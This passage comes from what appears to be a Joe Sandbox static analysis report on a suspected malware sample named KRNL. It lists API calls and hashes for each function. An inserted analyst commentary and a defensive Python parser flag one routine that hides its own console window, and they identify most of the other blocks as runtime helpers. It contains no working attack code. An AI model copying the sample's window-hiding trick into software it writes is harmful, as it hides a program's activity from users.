                                                                                                                                                                                                                                                            • Part of subcall function 006EF11D: CloseHandle.KERNEL32(?,?,?,006E253A,?,?,00000000), ref: 006EF154
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E2567
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E2578
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E2589
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E259A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3956949563-0
                                                                                                                                                                                                                                                          • Opcode ID: db3df0507b55c3079353c8bc4b00bcd022eb4bc768ff1bf4667a667eabde5eff
                                                                                                                                                                                                                                                          • Instruction ID: fa8da950fbd48eda3c8cdc4c0d6502c1009abf29ead60990ac50d5af12390bcb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db3df0507b55c3079353c8bc4b00bcd022eb4bc768ff1bf4667a667eabde5eff
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9821A5F2D413959BDF50AF959D07BDE7BBAAF04710F080128F60476281E7B6A504C6A6
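Reading the block above as an analyst: ShowWindow is called with nCmdShow 0, which is SW_HIDE, directly after GetConsoleWindow (the window-handle argument is unresolved in the static listing), so this function hides the process's own console window. The WaitForSingleObjectEx / GetExitCodeThread / CloseHandle trio inside subcall 006EF11D, together with GetCurrentThreadId and the std::_Throw_Cpp_error sites, has the shape of an MSVC std::thread::join; that reading is mine, not a finding stated by the sandbox. By contrast, the FreeLibrary routine that carries the api-ms-/ext-ms- strings and the GetProcAddress lookups of GetSystemTimePreciseAsFileTime and GetTempPath2W in the blocks further down are, in my assessment, the statically linked Microsoft C runtime's API-set thunk code rather than stealer logic, which matters when deciding which of the hundreds of function blocks in a report like this deserve attention. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses function blocks in the text shape shown on this page (bullet lines, "ref:" addresses, "Opcode ID" and "Instruction Fuzzy Hash" lines) into records and applies those readings as checks. The input is a constructed excerpt of the blocks on this page, and the flag names, the parser's assumptions about line shapes and the helper names are my own.

```python
"""Parse Joe Sandbox per-function 'APIs' blocks and flag console hiding.

Added example, not Joe Sandbox code. Assumes the line shapes shown in the
report above: bullet lines for API calls with 'ref: <addr>', nested
'Part of subcall function <addr>:' bullets, and 'Opcode ID' /
'Instruction Fuzzy Hash' bullets that close each function block.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: two blocks from this page, trimmed to the lines the
# parser uses. Leading whitespace and 'Download File' residue are tolerated.
SAMPLE = """\
APIs
• GetConsoleWindow.KERNEL32 ref: 006E24DD
• ShowWindow.USER32(00000000,00000000), ref: 006E24E6
• GetCurrentThreadId.KERNEL32 ref: 006E2524
  • Part of subcall function 006EF11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,006E253A,?,?,00000000), ref: 006EF129
  • Part of subcall function 006EF11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,006E253A,?,?,00000000), ref: 006EF142
  • Part of subcall function 006EF11D: CloseHandle.KERNEL32(?,?,?,006E253A,?,?,00000000), ref: 006EF154
• std::_Throw_Cpp_error.LIBCPMT ref: 006E2567
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
• Opcode ID: db3df0507b55c3079353c8bc4b00bcd022eb4bc768ff1bf4667a667eabde5eff
• Instruction Fuzzy Hash: 9821A5F2D413959BDF50AF959D07BDE7BBAAF04710F080128F60476281E7B6A504C6A6
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006F0086
• GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 006F0094
• GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 006F00A5
Strings
Memory Dump Source
• Opcode ID: 1d8798a295572aa36238ed6d6de65352cac2dfe8ecd2a3bb54ac44ab1b5d945d
• Instruction Fuzzy Hash: FCD09EBA5522106B83115FBC7C09CC93EA9FA09711301C152F441E22D0DA7C65419AED
"""

API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[\w:~$]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
OPCODE_RE = re.compile(r"^•\s*Opcode ID:\s*(?P<id>[0-9a-f]+)$")
FUZZY_RE = re.compile(r"^•\s*Instruction Fuzzy Hash:\s*(?P<hash>[0-9A-F]+)$")
SW_HIDE = "00000000"  # nCmdShow value that hides a window


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                          # call-site address from 'ref:'
    subcall_of: str | None = None     # callee address for nested bullets


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    opcode_id: str = ""
    fuzzy_hash: str = ""


def parse_records(text: str) -> list[FunctionRecord]:
    """One record per function block; a block ends at its fuzzy-hash line."""
    records: list[FunctionRecord] = []
    cur: FunctionRecord | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("Download File"):           # link residue on the page
            line = line[: -len("Download File")].rstrip()
        is_content = bool(API_RE.match(line) or OPCODE_RE.match(line) or FUZZY_RE.match(line))
        if line == "APIs" or (is_content and (cur is None or cur.fuzzy_hash)):
            cur = FunctionRecord()
            records.append(cur)
            if line == "APIs":
                continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = OPCODE_RE.match(line)
        if m:
            cur.opcode_id = m["id"]
            continue
        m = FUZZY_RE.match(line)
        if m:
            cur.fuzzy_hash = m["hash"]
    return records


def hides_console(rec: FunctionRecord) -> bool:
    """GetConsoleWindow followed by ShowWindow(_, SW_HIDE) in the same function."""
    got_console = False
    for c in rec.calls:
        if c.name == "GetConsoleWindow":
            got_console = True
        elif got_console and c.name == "ShowWindow" and len(c.args) == 2 and c.args[1] == SW_HIDE:
            return True
    return False


def joins_thread(rec: FunctionRecord) -> bool:
    """Wait, exit-code read and handle close inside one callee: a thread-join shape."""
    seen: dict[str, set[str]] = {}
    for c in rec.calls:
        if c.subcall_of:
            seen.setdefault(c.subcall_of, set()).add(c.name)
    needed = {"WaitForSingleObjectEx", "GetExitCodeThread", "CloseHandle"}
    return any(needed <= names for names in seen.values())


def resolves_dynamically(rec: FunctionRecord) -> list[str]:
    """Export names passed to GetProcAddress, in call order."""
    return [c.args[-1] for c in rec.calls if c.name == "GetProcAddress" and c.args]


def triage(text: str) -> list[dict]:
    """Compact per-function rows with my own flag names for the patterns above."""
    rows = []
    for rec in parse_records(text):
        flags = []
        if hides_console(rec):
            flags.append("hides-console-window")
        if joins_thread(rec):
            flags.append("joins-thread")
        if resolves_dynamically(rec):
            flags.append("dynamic-import")
        rows.append({"opcode_id": rec.opcode_id[:12], "calls": len(rec.calls),
                     "flags": flags, "resolves": resolves_dynamically(rec)})
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Run against the full text of a report, triage() gives one row per function block, so the handful of blocks that hide a window, resolve imports by name or join threads can be read off instead of paging through every runtime helper; the Opcode ID prefix in each row is enough to find the block again in the report.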
APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,BB40E64E,?,006FD01A,006E1170,006EAA08,?,?), ref: 006FCFCC
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: 21038a4c6a263bb1b9d6a63042490184febd2546351c5734fa47e0009f45b87d
• Instruction ID: 794264b3dd513a880de7a660db47844131e8426facfd5debb747b33aefa0c95a
• Opcode Fuzzy Hash: 21038a4c6a263bb1b9d6a63042490184febd2546351c5734fa47e0009f45b87d
• Instruction Fuzzy Hash: 3721F631A02219ABCB218B68ED41AEAB75B9F457B0F254111FA59A73D0D774ED00CAD0
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006F0086
• GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 006F0094
• GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 006F00A5
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
• API String ID: 667068680-1047828073
• Opcode ID: 1d8798a295572aa36238ed6d6de65352cac2dfe8ecd2a3bb54ac44ab1b5d945d
• Instruction ID: e9b8ae64561f45ce0c7949f3ae10230d7d786c665f964b454091b45a6a29c701
• Opcode Fuzzy Hash: 1d8798a295572aa36238ed6d6de65352cac2dfe8ecd2a3bb54ac44ab1b5d945d
• Instruction Fuzzy Hash: FCD09EBA5522106B83115FBC7C09CC93EA9FA09711301C152F441E22D0DA7C65419AED
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6e7c8fb666d9271c7d6cda6f98311830b881a333037df84a71feff34bd29dbe2
• Instruction ID: 8cf2d19bb5e8a2ad2b5e2a5776c6eaf0bd55c6c08583ad03aab2436cacb0edfe
• Opcode Fuzzy Hash: 6e7c8fb666d9271c7d6cda6f98311830b881a333037df84a71feff34bd29dbe2
• Instruction Fuzzy Hash: 0DB1E1B4A04A49EFDB11DFA8D840BBEBBF1BF49304F148258E900972C2C7799941CFA4
APIs
• std::_Throw_Cpp_error.LIBCPMT ref: 006E9C97
• std::_Throw_Cpp_error.LIBCPMT ref: 006E9CA8
• std::_Throw_Cpp_error.LIBCPMT ref: 006E9CBC
• std::_Throw_Cpp_error.LIBCPMT ref: 006E9CDD
• std::_Throw_Cpp_error.LIBCPMT ref: 006E9CEE
• std::_Throw_Cpp_error.LIBCPMT ref: 006E9D06
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Cpp_errorThrow_std::_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2134207285-0
                                                                                                                                                                                                                                                          • Opcode ID: e5fab6b2c589da800f67e20cfb920f36e95ffa60d82340013dc1bd73cdef1b67
                                                                                                                                                                                                                                                          • Instruction ID: 9320267bc15885780e24f8158d8190e29c47d907da69b4f21adf2af9b52efddc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5fab6b2c589da800f67e20cfb920f36e95ffa60d82340013dc1bd73cdef1b67
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE41F5B0902780CBDB30AB6289067EFB7F6AF45724F28062DD57A163D1D3316904CB66
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,006FACDE,006F0760,006EB77F,BB40E64E,?,?,?,?,0070BFCA,000000FF), ref: 006FACF5
                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006FAD03
                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006FAD1C
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,006FACDE,006F0760,006EB77F,BB40E64E,?,?,?,?,0070BFCA,000000FF), ref: 006FAD6E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                          • Opcode ID: 1be3106652f0810daad1cc47e7f5f2c5ac002a2d50be5124eeef8d2fa8c3fb60
                                                                                                                                                                                                                                                          • Instruction ID: ff97f8ed4bc408cf8d7c3fc3b2ad54830fc3a6f8cf20cc3f292b8784dfa646e1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1be3106652f0810daad1cc47e7f5f2c5ac002a2d50be5124eeef8d2fa8c3fb60
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC01F57220A619DEE7242AB87C498B626C6EF06B75720833AF714457F0EF1558039555
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 006FB68D
                                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 006FB906
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                          • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                          • Opcode ID: 20814496bd6f9ac2f7d51ead898cb949de318e68fe10d71cd96b549c7deaa051
                                                                                                                                                                                                                                                          • Instruction ID: ac47d030443d3a466e2c7c2c504038bfed802992aabd5bc1c8715c08c71212a4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20814496bd6f9ac2f7d51ead898cb949de318e68fe10d71cd96b549c7deaa051
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79B1677580020DEFCF14DFA4C8819BEBBBABF44310B14555AEA25AB212D731DA51CF96
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00428577
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                          • String ID: B]C]$B]V]$S%1e$S%1e
                                                                                                                                                                                                                                                          • API String ID: 237503144-91396555
                                                                                                                                                                                                                                                          • Opcode ID: 7fd0bbd5d6f31a729f27431df120334829b1dedf336d013a1b80b2b09c62a36b
                                                                                                                                                                                                                                                          • Instruction ID: 8746a14ed2116129ecf6ab586aa45845e2b2ebc96e851e8bdc8583723b65a5bd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fd0bbd5d6f31a729f27431df120334829b1dedf336d013a1b80b2b09c62a36b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED21057260C3255FE328CF25D8557ABF2E7EFC5700F11C83D95899B2D1DAB08446879A
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Ref_count_base::_Decref.LIBCPMT ref: 006EBF44
                                                                                                                                                                                                                                                          • std::_Ref_count_base::_Decref.LIBCPMT ref: 006EC028
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                          • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                          • API String ID: 1456557076-2671469338
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0070BE94,000000FF,?,006F5685,?,?,006F5721,00000000), ref: 006F55F9
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006F560B
• FreeLibrary.KERNEL32(00000000,?,?,00000000,0070BE94,000000FF,?,006F5685,?,?,006F5721,00000000), ref: 006F562D
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• __alloca_probe_16.LIBCMT ref: 006FD76F
• __alloca_probe_16.LIBCMT ref: 006FD838
• __freea.LIBCMT ref: 006FD89F
  • Part of subcall function 006FBF11: HeapAlloc.KERNEL32(00000000,00000018,00000000,?,006EA67D,00000018,?,006E3D4A,00000018,00000000), ref: 006FBF43
• __freea.LIBCMT ref: 006FD8B2
• __freea.LIBCMT ref: 006FD8BF
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$AllocHeap
• String ID:
• API String ID: 1096550386-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 006EF005
• AcquireSRWLockExclusive.KERNEL32(006E8E38), ref: 006EF024
• AcquireSRWLockExclusive.KERNEL32(006E8E38,006EA2F0,?), ref: 006EF052
• TryAcquireSRWLockExclusive.KERNEL32(006E8E38,006EA2F0,?), ref: 006EF0AD
• TryAcquireSRWLockExclusive.KERNEL32(006E8E38,006EA2F0,?), ref: 006EF0C4
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: AcquireExclusiveLock$CurrentThread
• String ID:
• API String ID: 66001078-0
APIs
• __EH_prolog3.LIBCMT ref: 006ED4C9
• std::_Lockit::_Lockit.LIBCPMT ref: 006ED4D3
• int.LIBCPMT ref: 006ED4EA
  • Part of subcall function 006EC1E5: std::_Lockit::_Lockit.LIBCPMT ref: 006EC1F6
  • Part of subcall function 006EC1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 006EC210
• codecvt.LIBCPMT ref: 006ED50D
• std::_Lockit::~_Lockit.LIBCPMT ref: 006ED544
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
• String ID:
• API String ID: 3716348337-0
APIs
• __EH_prolog3.LIBCMT ref: 006EADDE
• std::_Lockit::_Lockit.LIBCPMT ref: 006EADE9
• std::_Lockit::~_Lockit.LIBCPMT ref: 006EAE57
  • Part of subcall function 006EACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 006EACC2
• std::locale::_Setgloballocale.LIBCPMT ref: 006EAE04
• _Yarn.LIBCPMT ref: 006EAE1A
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
